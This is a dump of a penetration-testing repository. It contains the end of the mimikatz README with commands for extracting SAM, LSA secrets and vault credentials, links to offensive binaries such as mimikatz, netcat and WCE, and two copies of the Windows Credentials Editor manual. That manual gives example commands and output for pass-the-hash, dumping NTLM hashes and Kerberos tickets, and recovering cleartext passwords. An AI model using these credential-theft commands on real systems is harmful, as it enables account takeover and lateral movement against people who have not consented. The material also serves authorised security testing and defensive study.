| crypto::keys /machine /export 76 | ``` 77 | 78 | ### vault & lsadump 79 | ``` 80 | vault::cred 81 | vault::list 82 | 83 | token::elevate 84 | vault::cred 85 | vault::list 86 | lsadump::sam 87 | lsadump::secrets 88 | lsadump::cache 89 | token::revert 90 | ``` 91 | 92 | ## Build 93 | `mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: 94 | * for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=43733) 95 | * _for `mimikatz driver` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_ 96 | 97 | `mimikatz` uses `SVN` for source control, but is now available with `GIT` too! 98 | You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =) 99 | 100 | ### Synchronize! 101 | * GIT URL is : https://github.com/gentilkiwi/mimikatz.git 102 | * SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk 103 | * ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip 104 | 105 | ### Build the solution 106 | * After opening the solution, `Build` / `Build Solution` (you can change architecture) 107 | * `mimikatz` is now built and ready to be used! (`Win32` / `x64`) 108 | * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK. 109 | 110 | ### ddk2003 111 | With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies) 112 | 113 | For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after. 114 | 115 | Follow instructions: 116 | * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme 117 | * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_ 118 | 119 | ## Licence 120 | CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/ 121 | 122 | ## Author 123 | Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) 124 | 125 | This is a **personal** development, please respect its philosophy and don't use it for bad things! -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/Win32/mimidrv.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimidrv.sys -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/Win32/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimikatz.exe -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/Win32/mimilib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/Win32/mimilib.dll -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/x64/mimidrv.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimidrv.sys -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/x64/mimikatz.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimikatz.exe -------------------------------------------------------------------------------- /net/Windows/mimikatz_trunk/x64/mimilib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/mimikatz_trunk/x64/mimilib.dll -------------------------------------------------------------------------------- /net/Windows/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/nc.exe -------------------------------------------------------------------------------- /net/Windows/plink.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/plink.exe -------------------------------------------------------------------------------- /net/Windows/pscp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/pscp.exe -------------------------------------------------------------------------------- /net/Windows/radmin.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/radmin.exe -------------------------------------------------------------------------------- /net/Windows/sbd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/sbd.exe -------------------------------------------------------------------------------- /net/Windows/vncviewer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/vncviewer.exe -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/Changelog: -------------------------------------------------------------------------------- 1 | Changelog for Windows Credentials Editor (WCE) 32-bit 2 | 3 | 4 | 5 | version 1.42beta: 6 | 7 | Nov 11, 2013 8 | 9 | -Several bug fixes 10 | 11 | -Improved support for unicode, cleartext passwords with special characters 12 | 13 | obtained with -w switch 14 | 15 | version 1.41beta: 16 | July 9, 2013 17 | 18 | -Recompiled with VS2010 to make the EXE file (PE) compatible with XP/2003. 1.4beta 19 | was compiled with VS2012 which dropped support for XP/2003 and generates EXE PE files that are 20 | not compatible with XP/2003. 21 | 22 | version 1.41beta: 23 | 24 | May 30, 2013 25 | 26 | -Several bug fixes 27 | -Windows 8 Support 28 | -Updated getlsasrvaddr.exe 29 | 30 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/LICENSE.txt: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2010,2011,2012,2013 Hernan Ochoa and Amplia Security. 2 | 3 | # All rights reserved. 4 | 5 | # 6 | 7 | # Unless you have express writen permission from the Copyright Holder, any 8 | 9 | # use of or distribution of this software or portions of it, including, but not 10 | 11 | # limited to, reimplementations, modifications and derived work of it, in 12 | 13 | # either source code or any other form, as well as any other software using or 14 | 15 | # referencing it in any way, may NOT be sold for commercial gain, must be 16 | 17 | # covered by this very same license, and must retain this copyright notice and 18 | 19 | # this license. 20 | 21 | # Neither the name of the Copyright Holder nor the names of its contributors 22 | 23 | # may be used to endorse or promote products derived from this software 24 | 25 | # without specific prior written permission. 26 | 27 | # 28 | 29 | # THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE 30 | 31 | # LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR 32 | 33 | # OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND, 34 | 35 | # EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 36 | 37 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE 38 | 39 | # ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU. 40 | 41 | # SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY 42 | 43 | # SERVICING, REPAIR OR CORRECTION. 44 | 45 | # 46 | 47 | # IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 48 | 49 | # ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE 50 | 51 | # THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 52 | 53 | # GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE 54 | 55 | # OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR 56 | 57 | # DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR 58 | 59 | # A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH 60 | 61 | # HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 62 | 63 | # 64 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/README: -------------------------------------------------------------------------------- 1 | Windows Credentials Editor v1.42beta (32-bit) 2 | (c) 2010, 2011, 2012, 2013 Amplia Security, Hernan Ochoa 3 | written by: hernan@ampliasecurity.com 4 | http://www.ampliasecurity.com 5 | ------------------------------------------------------------- 6 | 7 | Abstract 8 | ---------- 9 | 10 | Windows Credentials Editor (WCE) v1.42beta allows you to 11 | 12 | NTLM authentication: 13 | 14 | * List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes) 15 | * Perform pass-the-hash on Windows natively 16 | * Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be 17 | used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed 18 | 19 | Kerberos authentication: 20 | 21 | * Dump Kerberos tickets (including the TGT) stored in Windows machines 22 | * Reuse/Load those tickets on another Windows machines, to authenticate to other systems and services 23 | * Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services 24 | 25 | Digest Authentication: 26 | 27 | * Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package 28 | 29 | 30 | Supported Platforms 31 | ------------------- 32 | Windows Credentials Editor supports Windows XP, 2003, Vista, 7, 2008 and 8. 33 | 34 | 35 | Requirements 36 | ------------- 37 | This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package. 38 | 39 | Kerberos tickets can be obtained as a normal user although administrator privileges might be required to obtain session keys depending on the system's configuration. 40 | 41 | Please remember this is an attack and post-exploitation tool. 42 | 43 | Options 44 | -------- 45 | Windows Credentials Editor provides the following options: 46 | 47 | Options: 48 | -l List logon sessions and NTLM credentials (default). 49 | -s Changes NTLM credentials of current logon session. 50 | Parameters: :::. 51 | -r Lists logon sessions and NTLM credentials indefinitely. 52 | Refreshes every 5 seconds if new sessions are found. 53 | Optional: -r. 54 | -c Run in a new session with the specified NTLM credentials. 55 | Parameters: . 56 | -e Lists logon sessions NTLM credentials indefinitely. 57 | Refreshes every time a logon event occurs. 58 | -o saves all output to a file. 59 | Parameters: . 60 | -i Specify LUID instead of use current logon session. 61 | Parameters: . 62 | -d Delete NTLM credentials from logon session. 63 | Parameters: . 64 | -a Use Addresses. 65 | Parameters: 66 | -f Force 'safe mode'. 67 | -g Generate LM & NT Hash. 68 | Parameters: . 69 | -K Dump Kerberos tickets to file (unix & 'windows wce' form 70 | at) 71 | -k Read Kerberos tickets from file and insert into Windows 72 | cache 73 | -w Dump cleartext passwords stored by the digest authentication package 74 | -v verbose output. 75 | 76 | Examples: 77 | 78 | * List current logon sessions 79 | 80 | C:\>wce -l 81 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 82 | Use -h for help. 83 | 84 | meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 85 | 86 | * List current logon sessions with verbose output enabled 87 | 88 | C:\>wce -l -v 89 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 90 | Use -h for help. 91 | 92 | Current Logon Session LUID: 00064081h 93 | Logon Sessions Found: 8 94 | WIN-REK2HG6EBIS\auser:NTLM 95 | LUID:0006409Fh 96 | WIN-REK2HG6EBIS\auser:NTLM 97 | LUID:00064081h 98 | NT AUTHORITY\ANONYMOUS LOGON:NTLM 99 | LUID:00019137h 100 | NT AUTHORITY\IUSR:Negotiate 101 | LUID:000003E3h 102 | NT AUTHORITY\LOCAL SERVICE:Negotiate 103 | LUID:000003E5h 104 | WORKGROUP\WIN-REK2HG6EBIS$:Negotiate 105 | LUID:000003E4h 106 | \:NTLM 107 | LUID:0000916Ah 108 | WORKGROUP\WIN-REK2HG6EBIS$:NTLM 109 | LUID:000003E7h 110 | 111 | 00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 112 | 113 | * Change NTLM credentials associated with current logon session 114 | 115 | C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 116 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 117 | Use -h for help. 118 | 119 | Changing NTLM credentials of current logon session (00064081h) to: 120 | Username: auser 121 | domain: admin 122 | LMHash: 99999999999999999999999999999999 123 | NTHash: 99999999999999999999999999999999 124 | NTLM credentials successfully changed! 125 | 126 | * Add/Change NTLM credentials of a logon session (not the current one) 127 | 128 | C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 129 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 130 | Use -h for help. 131 | 132 | Changing NTLM credentials of logon session 000003E5h to: 133 | Username: auser 134 | domain: admin 135 | LMHash: 99999999999999999999999999999999 136 | NTHash: 99999999999999999999999999999999 137 | NTLM credentials successfully changed! 138 | 139 | * Delete NTLM credentials associated with a logon session 140 | 141 | C:\>wce -d 3e5 142 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 143 | Use -h for help. 144 | 145 | NTLM credentials successfully deleted! 146 | 147 | * Run WCE indefinitely, waiting for new credentials/logon sessions. 148 | Refresh is performed every time a logon event is registered in the Event Log. 149 | 150 | C:\>wce -e 151 | 152 | * Run WCE indefinitely, waiting for new credentials/logon sessions 153 | Refresh is every 5 seconds by default. 154 | 155 | C:\>wce -r 156 | 157 | * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds) 158 | 159 | C:\>wce -r5 160 | 161 | 162 | * Generate LM & NT Hash. 163 | 164 | C:\>wce -g test 165 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 166 | Use -h for help. 167 | 168 | Password: test 169 | Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 170 | 171 | * Dump Kerberos tickets to file (unix & 'windows wce' format) 172 | 173 | C:\>wce -K 174 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 175 | Use -h for help. 176 | 177 | Converting and saving TGT in UNIX format to file wce_ccache... 178 | Converting and saving tickets in Windows WCE Format to file wce_krbtkts.. 179 | 5 kerberos tickets saved to file 'wce_ccache'. 180 | 5 kerberos tickets saved to file 'wce_krbtkts'. 181 | Done! 182 | 183 | * Read Kerberos tickets from file and insert into Windows cache 184 | 185 | C:\>wce -k 186 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 187 | Use -h for help. 188 | 189 | Reading kerberos tickets from file 'wce_krbtkts'... 190 | 5 kerberos tickets were added to the cache. 191 | Done! 192 | 193 | * Dump cleartext passwords stored by the Digest Authentication package 194 | 195 | C:\>wce -w 196 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010,2011,2012,2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 197 | Use -h for help. 198 | 199 | test\MYDOMAIN:mypass1234 200 | NETWORK SERVICE\WORKGROUP:test 201 | 202 | 203 | 204 | GETLSASRVADDR.EXE 205 | ----------------- 206 | This tool can be used to obtain automatically needed addresses for WCE 207 | to be able to read logon sessions and NTLM credentials from memory. 208 | 209 | Addresses obtained can then be used with WCE using the -A switch. 210 | 211 | This tool requires the dlls symsrv.dll and dbghelp.dll available from the 212 | "Debugging Tools for Windows" package. 213 | 214 | 215 | Additional Information 216 | ---------------------- 217 | 218 | * http://www.ampliasecurity.com/research.html 219 | * http://www.ampliasecurity.com/research/wcefaq.html 220 | * http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf 221 | * http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf 222 | 223 | 224 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/getlsasrvaddr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x32/getlsasrvaddr.exe -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/wce.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x32/wce.exe -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/Changelog: -------------------------------------------------------------------------------- 1 | Changelog for Windows Credentials Editor (WCE) 64-bit 2 | 3 | version 1.42beta: 4 | Nov 11, 2013 5 | -Bug fixes 6 | -Improved support for unicode, cleartext passwords with special characters dumped withe -w switch 7 | -Improved 'safe mode'. No code injection needed. 8 | 9 | version 1.41beta: 10 | July 13, 2013 11 | -Compiled with VS2010 because VS2012 breaks compatibility 12 | with Windows 2008, XP and other previous versions of Windows. 13 | 14 | version 1.4beta: 15 | 16 | May 30, 2013 17 | 18 | -Several bug fixes 19 | 20 | -Windows 8 Support 21 | 22 | 23 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/LICENSE.txt: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2010,2011,2012,2013 Hernan Ochoa and Amplia Security. 2 | 3 | # All rights reserved. 4 | 5 | # 6 | 7 | # Unless you have express writen permission from the Copyright Holder, any 8 | 9 | # use of or distribution of this software or portions of it, including, but not 10 | 11 | # limited to, reimplementations, modifications and derived work of it, in 12 | 13 | # either source code or any other form, as well as any other software using or 14 | 15 | # referencing it in any way, may NOT be sold for commercial gain, must be 16 | 17 | # covered by this very same license, and must retain this copyright notice and 18 | 19 | # this license. 20 | 21 | # Neither the name of the Copyright Holder nor the names of its contributors 22 | 23 | # may be used to endorse or promote products derived from this software 24 | 25 | # without specific prior written permission. 26 | 27 | # 28 | 29 | # THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE 30 | 31 | # LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR 32 | 33 | # OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND, 34 | 35 | # EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 36 | 37 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE 38 | 39 | # ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU. 40 | 41 | # SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY 42 | 43 | # SERVICING, REPAIR OR CORRECTION. 44 | 45 | # 46 | 47 | # IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 48 | 49 | # ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE 50 | 51 | # THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 52 | 53 | # GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE 54 | 55 | # OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR 56 | 57 | # DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR 58 | 59 | # A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH 60 | 61 | # HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 62 | 63 | # 64 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/README: -------------------------------------------------------------------------------- 1 | Windows Credentials Editor v1.42beta (64-bit) 2 | (c) 2010, 2011, 2012, 2013 Amplia Security, Hernan Ochoa 3 | written by: hernan@ampliasecurity.com 4 | http://www.ampliasecurity.com 5 | ------------------------------------------------------------- 6 | 7 | Abstract 8 | ---------- 9 | 10 | Windows Credentials Editor (WCE) v1.42beta allows you to 11 | 12 | NTLM authentication: 13 | 14 | * List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes) 15 | * Perform pass-the-hash on Windows natively 16 | * Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be 17 | used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed 18 | 19 | Kerberos authentication: 20 | 21 | * Dump Kerberos tickets (including the TGT) stored in Windows machines 22 | * Reuse/Load those tickets on another Windows machines, to authenticate to other systems and services 23 | * Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services 24 | 25 | Digest Authentication: 26 | 27 | * Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package 28 | 29 | 30 | Supported Platforms 31 | ------------------- 32 | Windows Credentials Editor supports Windows XP, 2003, Vista, 7, 2008 and 8. 33 | 34 | 35 | Requirements 36 | ------------- 37 | This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package. 38 | 39 | Kerberos tickets can be obtained as a normal user although administrator privileges might be required to obtain session keys depending on the system's configuration. 40 | 41 | Please remember this is an attack and post-exploitation tool. 42 | 43 | Options 44 | -------- 45 | Windows Credentials Editor provides the following options: 46 | 47 | Options: 48 | -l List logon sessions and NTLM credentials (default). 49 | -s Changes NTLM credentials of current logon session. 50 | Parameters: :::. 51 | -r Lists logon sessions and NTLM credentials indefinitely. 52 | Refreshes every 5 seconds if new sessions are found. 53 | Optional: -r. 54 | -c Run in a new session with the specified NTLM credentials. 55 | Parameters: . 56 | -e Lists logon sessions NTLM credentials indefinitely. 57 | Refreshes every time a logon event occurs. 58 | -o saves all output to a file. 59 | Parameters: . 60 | -i Specify LUID instead of use current logon session. 61 | Parameters: . 62 | -d Delete NTLM credentials from logon session. 63 | Parameters: . 64 | -a Use Addresses. 65 | Parameters: 66 | -f Force 'safe mode'. 67 | -g Generate LM & NT Hash. 68 | Parameters: . 69 | -K Dump Kerberos tickets to file (unix & 'windows wce' form 70 | at) 71 | -k Read Kerberos tickets from file and insert into Windows 72 | cache 73 | -w Dump cleartext passwords stored by the digest authentication package 74 | -v verbose output. 75 | 76 | Examples: 77 | 78 | * List current logon sessions 79 | 80 | C:\>wce -l 81 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 82 | Use -h for help. 83 | 84 | meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 85 | 86 | * List current logon sessions with verbose output enabled 87 | 88 | C:\>wce -l -v 89 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 90 | Use -h for help. 91 | 92 | Current Logon Session LUID: 00064081h 93 | Logon Sessions Found: 8 94 | WIN-REK2HG6EBIS\auser:NTLM 95 | LUID:0006409Fh 96 | WIN-REK2HG6EBIS\auser:NTLM 97 | LUID:00064081h 98 | NT AUTHORITY\ANONYMOUS LOGON:NTLM 99 | LUID:00019137h 100 | NT AUTHORITY\IUSR:Negotiate 101 | LUID:000003E3h 102 | NT AUTHORITY\LOCAL SERVICE:Negotiate 103 | LUID:000003E5h 104 | WORKGROUP\WIN-REK2HG6EBIS$:Negotiate 105 | LUID:000003E4h 106 | \:NTLM 107 | LUID:0000916Ah 108 | WORKGROUP\WIN-REK2HG6EBIS$:NTLM 109 | LUID:000003E7h 110 | 111 | 00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 112 | 113 | * Change NTLM credentials associated with current logon session 114 | 115 | C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 116 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 117 | Use -h for help. 118 | 119 | Changing NTLM credentials of current logon session (00064081h) to: 120 | Username: auser 121 | domain: admin 122 | LMHash: 99999999999999999999999999999999 123 | NTHash: 99999999999999999999999999999999 124 | NTLM credentials successfully changed! 125 | 126 | * Add/Change NTLM credentials of a logon session (not the current one) 127 | 128 | C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 129 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 130 | Use -h for help. 131 | 132 | Changing NTLM credentials of logon session 000003E5h to: 133 | Username: auser 134 | domain: admin 135 | LMHash: 99999999999999999999999999999999 136 | NTHash: 99999999999999999999999999999999 137 | NTLM credentials successfully changed! 138 | 139 | * Delete NTLM credentials associated with a logon session 140 | 141 | C:\>wce -d 3e5 142 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 143 | Use -h for help. 144 | 145 | NTLM credentials successfully deleted! 146 | 147 | * Run WCE indefinitely, waiting for new credentials/logon sessions. 148 | Refresh is performed every time a logon event is registered in the Event Log. 149 | 150 | C:\>wce -e 151 | 152 | * Run WCE indefinitely, waiting for new credentials/logon sessions 153 | Refresh is every 5 seconds by default. 154 | 155 | C:\>wce -r 156 | 157 | * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds) 158 | 159 | C:\>wce -r5 160 | 161 | 162 | * Generate LM & NT Hash. 163 | 164 | C:\>wce -g test 165 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 166 | Use -h for help. 167 | 168 | Password: test 169 | Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 170 | 171 | * Dump Kerberos tickets to file (unix & 'windows wce' format) 172 | 173 | C:\>wce -K 174 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 175 | Use -h for help. 176 | 177 | Converting and saving TGT in UNIX format to file wce_ccache... 178 | Converting and saving tickets in Windows WCE Format to file wce_krbtkts.. 179 | 5 kerberos tickets saved to file 'wce_ccache'. 180 | 5 kerberos tickets saved to file 'wce_krbtkts'. 181 | Done! 182 | 183 | * Read Kerberos tickets from file and insert into Windows cache 184 | 185 | C:\>wce -k 186 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 187 | Use -h for help. 188 | 189 | Reading kerberos tickets from file 'wce_krbtkts'... 190 | 5 kerberos tickets were added to the cache. 191 | Done! 192 | 193 | * Dump cleartext passwords stored by the Digest Authentication package 194 | 195 | C:\>wce -w 196 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010,2011,2012,2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 197 | Use -h for help. 198 | 199 | test\MYDOMAIN:mypass1234 200 | NETWORK SERVICE\WORKGROUP:test 201 | 202 | 203 | Additional Information 204 | ---------------------- 205 | 206 | * http://www.ampliasecurity.com/research.html 207 | * http://www.ampliasecurity.com/research/wcefaq.html 208 | * http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf 209 | * http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf 210 | 211 | 212 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/wce.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x64/wce.exe -------------------------------------------------------------------------------- /net/Windows/wget.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wget.exe -------------------------------------------------------------------------------- /net/Windows/whoami.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/whoami.exe -------------------------------------------------------------------------------- /net/help.md: -------------------------------------------------------------------------------- 1 | Infrastructure help 2 | ======= 3 | 4 | * [Infrastructure help](#infrastructure-help) 5 | * [Enumeration](#enumeration) 6 | * [Arp Scan](#arp-scan) 7 | * [Ping Sweep](#ping-sweep) 8 | * [Port Scan](#port-scan) 9 | * [Web](#web) 10 | * [SMB](#smb) 11 | * 